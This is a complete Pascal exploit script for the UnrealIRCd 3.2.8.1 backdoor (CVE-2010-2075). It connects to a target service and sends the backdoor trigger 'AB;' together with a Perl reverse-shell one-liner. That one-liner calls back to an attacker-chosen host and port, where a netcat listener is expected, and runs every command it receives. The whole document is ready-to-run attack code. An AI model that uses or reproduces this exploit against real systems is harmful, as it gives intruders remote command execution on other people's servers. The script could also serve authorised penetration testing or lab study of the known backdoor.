program exploit;

{
  CVE               CVE-2010-2075
  Vulnerability     UnrealIRCD v3.2.8.1 has an RCE - If you send AB; <command> to any listening service it executes the command
  Requirements      Synapse - Install through OPM
  License           Apache 2.0
  Author            Marcus Fernstrom
}

uses
  tlntsend, sysutils;

var
  Sock: TTelnetSend;
begin
  if paramCount <> 4 then begin
    WriteLn('Usage ./exploit <target ip> <target port> <host ip> <host port>');
    WriteLn('Where <host ip> <host port> is where you are running a netcat listener');

  end else begin
    Sock := TTelnetSend.Create;
    try
      Sock.TargetHost := ParamStr(1);
      Sock.TargetPort := ParamStr(2);
      Sock.Timeout := 1000;
      Sock.Login;
      Sock.Send('AB; perl -MIO -e ''$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"' + ParamStr(3) + ':' + ParamStr(4) + '");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};''');
      Sock.Logout;
    finally
      Sock.Free;
    end;
  end;
end.